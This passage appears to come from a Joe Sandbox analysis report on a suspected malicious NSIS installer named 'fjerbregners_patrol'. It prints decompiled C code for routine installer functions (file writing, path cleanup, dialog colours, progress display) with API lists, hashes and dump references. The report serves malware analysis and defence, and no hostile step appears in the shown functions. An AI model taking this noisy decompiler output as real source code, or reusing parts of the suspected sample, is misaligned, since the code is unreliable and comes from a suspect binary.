                                                                                                                                                                                            • Opcode Fuzzy Hash: a9128453349c8f2434c1cf46ed29d2249ee925f25d7b1e92cf996b71b476f12a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6031F4712016117BDB203B259E49F6B365CDF81758B12047EF943F62C2DBBC98664A7C
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00402A05 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                            			E00402A05(void* __ebx, void* _a4, void* _a8, intOrPtr _a12, intOrPtr _a20, long _a24, void* _a28, void* _a40, intOrPtr* _a52, CHAR* _a80) {
				void* _v0;
				void* _v4;
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v36;
				intOrPtr _t30;
				long _t36;
				void* _t48;
				void* _t50;
				void* _t51;
				void* _t52;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;
				void* _t58;
				intOrPtr _t59;
				CHAR* _t60;
				void* _t62;
				void* _t63;

				_t48 = __ebx;
				_a28 = 0xfffffd66;
				_t60 = E00402E92(_t51, 0xfffffff0);
				_a80 = _t60;
				if(E00406B9E(_t60) == 0) {
					E00402E92(__edx, 0xffffffed);
				}
				E0040698D(_t60);
				_t52 = E0040671A(_t60, 0x40000000, 2);
				 *(_t63 + 0x4c) = _t52;
				if(_t52 != 0xffffffff) {
					_t33 =  *(_t63 + 0x2c);
					 *(_t63 + 0x40) =  *(_t63 + 0x2c);
					if( *(_t63 + 0x30) != _t48) {
						_t36 =  *0x424008;
						_a24 = _t36;
						_t58 = GlobalAlloc(0x40, _t36);
						_a28 = _t58;
						if(_t58 == 0) {
							_t33 =  *(_t63 + 0x40);
						} else {
							E00402F40(_t48);
							E00402F2A(_t58, _a20);
							_t54 = GlobalAlloc(0x40,  *(_t63 + 0x30));
							_a52 = _t54;
							if(_t54 != 0) {
								E004030D6(_t50,  *((intOrPtr*)(_t63 + 0x38)), _t48, _t54,  *(_t63 + 0x30));
								if( *_t54 != _t48) {
									_t62 = _t58;
									do {
										_t59 =  *_t54;
										_t55 = _t54 + 8;
										E00406498( *((intOrPtr*)(_t54 + 4)) + _t62, _t55, _t59);
										_t54 = _t55 + _t59;
									} while ( *_t54 != _t48);
									_t60 =  *(_t63 + 0x54);
									_t58 = _a28;
								}
								GlobalFree( *(_t63 + 0x40));
							}
							_t52 =  *(_t63 + 0x50);
							E00406806(_t50, _t52, _t58, _a24);
							_t33 = GlobalFree(_t58) | 0xffffffff;
						}
					}
					_a12 = E004030D6(_t50, _t33, _t52, _t48, _t48);
					CloseHandle(_t52);
				}
				_t56 = 0xfffffff3;
				if(_a28 < _t48) {
					_t56 = 0xffffffef;
					DeleteFileA(_t60);
					 *((intOrPtr*)(_t63 + 0x10)) = 1;
				}
				_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
				_push(_t56);
				E00405BA4();
				_t30 =  *((intOrPtr*)(_t63 + 0x10));
				 *0x4240c8 =  *0x4240c8 + _t30;
				return 0;
			}























                                                                                                                                                                                            0x00402a05
                                                                                                                                                                                            0x00402a07
                                                                                                                                                                                            0x00402a14
                                                                                                                                                                                            0x00402a17
                                                                                                                                                                                            0x00402a22
                                                                                                                                                                                            0x00402a26
                                                                                                                                                                                            0x00402a26
                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                            0x00402a3e
                                                                                                                                                                                            0x00402a40
                                                                                                                                                                                            0x00402a47
                                                                                                                                                                                            0x00402a4d
                                                                                                                                                                                            0x00402a51
                                                                                                                                                                                            0x00402a59
                                                                                                                                                                                            0x00402a5f
                                                                                                                                                                                            0x00402a67
                                                                                                                                                                                            0x00402a71
                                                                                                                                                                                            0x00402a73
                                                                                                                                                                                            0x00402a79
                                                                                                                                                                                            0x00402aff
                                                                                                                                                                                            0x00402a7f
                                                                                                                                                                                            0x00402a80
                                                                                                                                                                                            0x00402a8a
                                                                                                                                                                                            0x00402a9b
                                                                                                                                                                                            0x00402a9d
                                                                                                                                                                                            0x00402aa3
                                                                                                                                                                                            0x00402aaf
                                                                                                                                                                                            0x00402ab6
                                                                                                                                                                                            0x00402ab8
                                                                                                                                                                                            0x00402aba
                                                                                                                                                                                            0x00402aba
                                                                                                                                                                                            0x00402abf
                                                                                                                                                                                            0x00402ac7
                                                                                                                                                                                            0x00402acc
                                                                                                                                                                                            0x00402ace
                                                                                                                                                                                            0x00402ad2
                                                                                                                                                                                            0x00402ad6
                                                                                                                                                                                            0x00402ad6
                                                                                                                                                                                            0x00402ade
                                                                                                                                                                                            0x00402ade
                                                                                                                                                                                            0x00402ae8
                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                            0x00402afa
                                                                                                                                                                                            0x00402afa
                                                                                                                                                                                            0x00402a79
                                                                                                                                                                                            0x00402b0d
                                                                                                                                                                                            0x00402b11
                                                                                                                                                                                            0x00402b11
                                                                                                                                                                                            0x00402b19
                                                                                                                                                                                            0x00402b1e
                                                                                                                                                                                            0x00402b22
                                                                                                                                                                                            0x00402b24
                                                                                                                                                                                            0x00402b2a
                                                                                                                                                                                            0x00402b2a
                                                                                                                                                                                            0x00402b32
                                                                                                                                                                                            0x004015f2
                                                                                                                                                                                            0x004015f3
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402A6B
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A95
                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402ADE
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402AF4
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402B11
                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402B24
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll, xrefs: 00402B32
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll
                                                                                                                                                                                            • API String ID: 2667972263-3847184189
                                                                                                                                                                                            • Opcode ID: 209d53eecab91f98f35a23c0a3abf20955390e5e1ca6d41a87dda91ef2101d23
                                                                                                                                                                                            • Instruction ID: c7950b332cedea4fa0d8344c6c4a25d43873f207fae4976bad9930f85170f7db
                                                                                                                                                                                            • Opcode Fuzzy Hash: 209d53eecab91f98f35a23c0a3abf20955390e5e1ca6d41a87dda91ef2101d23
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7031E671408351AFC710AF658E08E1FBBE8BF85358F00463EF991732D2DBB898018B99
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406AED Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406AED(CHAR* _a4) {
				char* _v4;
				char _t11;
				CHAR* _t19;
				char* _t20;
				CHAR* _t21;
				char* _t22;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 == 0x5c && _t21[1] == _t19 && _t21[2] == 0x3f && _t21[3] == _t19) {
					_t21 =  &(_t21[4]);
					_t19 =  *_t21;
				}
				if(_t19 != 0 && E00406B9E(_t21) != 0) {
					_t21 =  &(_t21[2]);
					_t19 =  *_t21;
				}
				_t22 = _t21;
				_t20 = _t21;
				_v4 = _t22;
				if(_t19 != 0) {
					_a4 = _t19;
					do {
						if(_t19 > 0x1f &&  *((char*)(E004063E4("*?|<>/\":", _a4))) == 0) {
							E00406498(_t20, _t21, CharNextA(_t21) - _t21);
							_t20 = CharNextA(_t20);
						}
						_t21 = CharNextA(_t21);
						_t19 =  *_t21;
						_a4 = _t19;
					} while (_t19 != 0);
					_t22 = _v4;
				}
				 *_t20 = 0;
				while(1) {
					_t20 = CharPrevA(_t22, _t20);
					_t11 =  *_t20;
					if(_t11 != 0x20 && _t11 != 0x5c) {
						break;
					}
					 *_t20 = 0;
					if(_t22 < _t20) {
						continue;
					}
					break;
				}
				return _t11;
			}









                                                                                                                                                                                            0x00406af1
                                                                                                                                                                                            0x00406af6
                                                                                                                                                                                            0x00406afb
                                                                                                                                                                                            0x00406b0d
                                                                                                                                                                                            0x00406b10
                                                                                                                                                                                            0x00406b10
                                                                                                                                                                                            0x00406b14
                                                                                                                                                                                            0x00406b20
                                                                                                                                                                                            0x00406b23
                                                                                                                                                                                            0x00406b23
                                                                                                                                                                                            0x00406b25
                                                                                                                                                                                            0x00406b27
                                                                                                                                                                                            0x00406b29
                                                                                                                                                                                            0x00406b2f
                                                                                                                                                                                            0x00406b37
                                                                                                                                                                                            0x00406b3b
                                                                                                                                                                                            0x00406b3e
                                                                                                                                                                                            0x00406b5b
                                                                                                                                                                                            0x00406b63
                                                                                                                                                                                            0x00406b63
                                                                                                                                                                                            0x00406b68
                                                                                                                                                                                            0x00406b6a
                                                                                                                                                                                            0x00406b6c
                                                                                                                                                                                            0x00406b70
                                                                                                                                                                                            0x00406b74
                                                                                                                                                                                            0x00406b74
                                                                                                                                                                                            0x00406b78
                                                                                                                                                                                            0x00406b7b
                                                                                                                                                                                            0x00406b83
                                                                                                                                                                                            0x00406b85
                                                                                                                                                                                            0x00406b89
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406b8f
                                                                                                                                                                                            0x00406b94
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406b94
                                                                                                                                                                                            0x00406b9b

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B54
                                                                                                                                                                                            • CharNextA.USER32(?,?,?,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B61
                                                                                                                                                                                            • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B66
                                                                                                                                                                                            • CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B7D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406AF0
                                                                                                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406AF5
                                                                                                                                                                                            • *?|<>/":, xrefs: 00406B44
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                                                                                            • API String ID: 589700163-2188270913
                                                                                                                                                                                            • Opcode ID: e857ddb04d48a12fccbd882645d57226797bb3a106b55286687b8f969076e261
                                                                                                                                                                                            • Instruction ID: eea248b365fd0454c50f7be2278b025153c3af66ab9016d595eaaae13992735d
                                                                                                                                                                                            • Opcode Fuzzy Hash: e857ddb04d48a12fccbd882645d57226797bb3a106b55286687b8f969076e261
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E11C5A19453A52DE7325A341800B67BFE84F67350F1E047FE4C6A3382E6396C65936D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004055E0 Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004055E0(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				void* _t38;
				signed char _t40;
				signed char _t42;
				long _t51;
				long _t52;
				long* _t55;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					_t38 = 0;
				} else {
					_t55 = GetWindowLongA(_a12, 0xffffffeb);
					if(_t55 == 0 || _t55[2] > 1 || _t55[4] > 2) {
						goto L18;
					} else {
						_t40 = _t55[5];
						if((_t40 & 0xffffffe0) != 0) {
							goto L18;
						} else {
							_t51 =  *_t55;
							if((_t40 & 0x00000002) != 0) {
								_t51 = GetSysColor(_t51);
								_t40 = _t55[5];
							}
							if((_t40 & 0x00000001) != 0) {
								SetTextColor(_a8, _t51);
							}
							SetBkMode(_a8, _t55[4]);
							_t42 = _t55[5];
							_t52 = _t55[1];
							_v16.lbColor = _t52;
							if((_t42 & 0x00000008) != 0) {
								_t52 = GetSysColor(_t52);
								_t42 = _t55[5];
								_v16.lbColor = _t52;
							}
							if((_t42 & 0x00000004) != 0) {
								SetBkColor(_a8, _t52);
								_t42 = _t55[5];
							}
							if((_t42 & 0x00000010) != 0) {
								_v16.lbStyle = _t55[2];
								if(_t55[3] != 0) {
									DeleteObject(_t55[3]);
								}
								_t55[3] = CreateBrushIndirect( &_v16);
							}
							_t38 = _t55[3];
						}
					}
				}
				return _t38;
			}










                                                                                                                                                                                            0x004055f2
                                                                                                                                                                                            0x004056b3
                                                                                                                                                                                            0x004056b3
                                                                                                                                                                                            0x004055f8
                                                                                                                                                                                            0x00405603
                                                                                                                                                                                            0x00405607
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405621
                                                                                                                                                                                            0x00405621
                                                                                                                                                                                            0x00405629
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040562f
                                                                                                                                                                                            0x0040562f
                                                                                                                                                                                            0x00405633
                                                                                                                                                                                            0x0040563c
                                                                                                                                                                                            0x0040563e
                                                                                                                                                                                            0x0040563e
                                                                                                                                                                                            0x00405643
                                                                                                                                                                                            0x00405649
                                                                                                                                                                                            0x00405649
                                                                                                                                                                                            0x00405655
                                                                                                                                                                                            0x0040565b
                                                                                                                                                                                            0x0040565e
                                                                                                                                                                                            0x00405661
                                                                                                                                                                                            0x00405666
                                                                                                                                                                                            0x0040566f
                                                                                                                                                                                            0x00405671
                                                                                                                                                                                            0x00405674
                                                                                                                                                                                            0x00405674
                                                                                                                                                                                            0x00405679
                                                                                                                                                                                            0x0040567f
                                                                                                                                                                                            0x00405685
                                                                                                                                                                                            0x00405685
                                                                                                                                                                                            0x0040568a
                                                                                                                                                                                            0x00405693
                                                                                                                                                                                            0x00405696
                                                                                                                                                                                            0x0040569b
                                                                                                                                                                                            0x0040569b
                                                                                                                                                                                            0x004056ab
                                                                                                                                                                                            0x004056ab
                                                                                                                                                                                            0x004056ae
                                                                                                                                                                                            0x004056ae
                                                                                                                                                                                            0x00405629
                                                                                                                                                                                            0x00405607
                                                                                                                                                                                            0x004056b7

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                            • Opcode ID: dd0fb022962e291b6d8bf418a07af01b72cc1c8f8f87155cdfae288084505abc
                                                                                                                                                                                            • Instruction ID: 0516f1b8b467b8d5665c37c23410926c8b046ca8387686070333458063308fbe
                                                                                                                                                                                            • Opcode Fuzzy Hash: dd0fb022962e291b6d8bf418a07af01b72cc1c8f8f87155cdfae288084505abc
                                                                                                                                                                                            • Instruction Fuzzy Hash: DC211975600A049FDB349F28DA48A5BB7F4EF057147408E3DE89AB27A0DB36E844CF58
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE82128 Relevance: 10.6, APIs: 7, Instructions: 117COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                            			E6EE82128(intOrPtr* _a4) {
				short _v84;
				intOrPtr* _t24;
				signed int _t25;
				intOrPtr _t26;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E6EE812C6();
				_t24 = _a4;
				_t33 =  *((intOrPtr*)(_t24 + 0x814));
				_t42 = (_t33 + 0x41 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t25 =  *(_t42 - 8) & 0x000000ff;
					if(_t25 <= 7) {
						switch( *((intOrPtr*)(_t25 * 4 +  &M6EE82268))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x6ee84060 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x6ee84080 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E6EE8144D(__ecx);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__edx,  *0x6ee85040);
								goto L17;
							case 4:
								__ecx =  *0x6ee85040;
								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
								__eax =  *0x6ee85040;
								 *((char*)(__eax + __edi - 1)) = 0;
								goto L17;
							case 5:
								_push(0x27);
								__eax =  &_v84;
								_push( &_v84);
								_push( *__edx);
								__imp__StringFromGUID2();
								__ecx = 0;
								__eax =  &_v84;
								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x6ee85040, 0, 0);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x6ee84058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t26 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t26 != 0) {
						if(_t26 != 0xffffffff) {
							if(_t26 > 0) {
								E6EE815C7(_t26 - 1, _t39);
								goto L26;
							}
						} else {
							E6EE8157E(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}










                                                                                                                                                                                            0x6ee82136
                                                                                                                                                                                            0x6ee82138
                                                                                                                                                                                            0x6ee8213b
                                                                                                                                                                                            0x6ee82147
                                                                                                                                                                                            0x6ee82149
                                                                                                                                                                                            0x6ee8214e
                                                                                                                                                                                            0x6ee8214e
                                                                                                                                                                                            0x6ee82156
                                                                                                                                                                                            0x6ee8215d
                                                                                                                                                                                            0x6ee82163
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8216a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82172
                                                                                                                                                                                            0x6ee82176
                                                                                                                                                                                            0x6ee82178
                                                                                                                                                                                            0x6ee82179
                                                                                                                                                                                            0x6ee82184
                                                                                                                                                                                            0x6ee82188
                                                                                                                                                                                            0x6ee82188
                                                                                                                                                                                            0x6ee8218f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82192
                                                                                                                                                                                            0x6ee82193
                                                                                                                                                                                            0x6ee82196
                                                                                                                                                                                            0x6ee82198
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee821a8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee821d8
                                                                                                                                                                                            0x6ee821ee
                                                                                                                                                                                            0x6ee821f4
                                                                                                                                                                                            0x6ee821f9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee821b0
                                                                                                                                                                                            0x6ee821b2
                                                                                                                                                                                            0x6ee821b5
                                                                                                                                                                                            0x6ee821b6
                                                                                                                                                                                            0x6ee821b8
                                                                                                                                                                                            0x6ee821be
                                                                                                                                                                                            0x6ee821ca
                                                                                                                                                                                            0x6ee821d0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82200
                                                                                                                                                                                            0x6ee82202
                                                                                                                                                                                            0x6ee82208
                                                                                                                                                                                            0x6ee8220e
                                                                                                                                                                                            0x6ee8220e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee82163
                                                                                                                                                                                            0x6ee82211
                                                                                                                                                                                            0x6ee82215
                                                                                                                                                                                            0x6ee82228
                                                                                                                                                                                            0x6ee82228
                                                                                                                                                                                            0x6ee8222e
                                                                                                                                                                                            0x6ee82233
                                                                                                                                                                                            0x6ee82238
                                                                                                                                                                                            0x6ee82244
                                                                                                                                                                                            0x6ee82249
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8224e
                                                                                                                                                                                            0x6ee8223a
                                                                                                                                                                                            0x6ee8223b
                                                                                                                                                                                            0x6ee8224f
                                                                                                                                                                                            0x6ee8224f
                                                                                                                                                                                            0x6ee82238
                                                                                                                                                                                            0x6ee82250
                                                                                                                                                                                            0x6ee82253
                                                                                                                                                                                            0x6ee82253
                                                                                                                                                                                            0x6ee82267

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 6EE812C6: GlobalAlloc.KERNEL32(00000040,6EE811C4,-000000A0), ref: 6EE812CE
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE82228
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE8225D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1780285237-0
                                                                                                                                                                                            • Opcode ID: 4f68665563602ece105e018c5f62011073d263c724b6d9bc3551afeecf12a0b6
                                                                                                                                                                                            • Instruction ID: ec726164dc097d8608d960f07161650055a3c70d6a07238df97156af7bf53cb5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f68665563602ece105e018c5f62011073d263c724b6d9bc3551afeecf12a0b6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1041E231114101EFDB198FE4EE45F6B77BDFB5B304F20011AE9099B294E731A846DB62
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004031F8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                            			E004031F8(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 == 0) {
					if( *0x40b540 == 0) {
						_t6 = GetTickCount();
						if(_t6 <=  *0x424000) {
							L11:
							return _t6;
						} else {
							if( *0x4237f8 == 0) {
								_t7 = CreateDialogParamA( *0x4237f4, 0x6f, 0, E00403553, 0);
								 *0x40b540 = _t7;
								return ShowWindow(_t7, 5);
							}
							if(( *0x4240f4 & 0x00000001) == 0) {
								goto L11;
							} else {
								wsprintfA( &_v68, "... %d%%", E004031DA());
								_push( &_v68);
								_push(0);
								return E00405BA4();
							}
						}
					} else {
						return E004060B7(0);
					}
				} else {
					_t15 =  *0x40b540; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x40b540 =  *0x40b540 & 0x00000000;
					return _t15;
				}
			}







                                                                                                                                                                                            0x00403202
                                                                                                                                                                                            0x00403224
                                                                                                                                                                                            0x0040322f
                                                                                                                                                                                            0x0040323b
                                                                                                                                                                                            0x0040329a
                                                                                                                                                                                            0x0040329a
                                                                                                                                                                                            0x0040323d
                                                                                                                                                                                            0x00403244
                                                                                                                                                                                            0x00403285
                                                                                                                                                                                            0x0040328e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403293
                                                                                                                                                                                            0x0040324d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040324f
                                                                                                                                                                                            0x0040325e
                                                                                                                                                                                            0x0040326a
                                                                                                                                                                                            0x0040326b
                                                                                                                                                                                            0x00403273
                                                                                                                                                                                            0x00403273
                                                                                                                                                                                            0x0040324d
                                                                                                                                                                                            0x00403226
                                                                                                                                                                                            0x0040322e
                                                                                                                                                                                            0x0040322e
                                                                                                                                                                                            0x00403204
                                                                                                                                                                                            0x00403204
                                                                                                                                                                                            0x0040320b
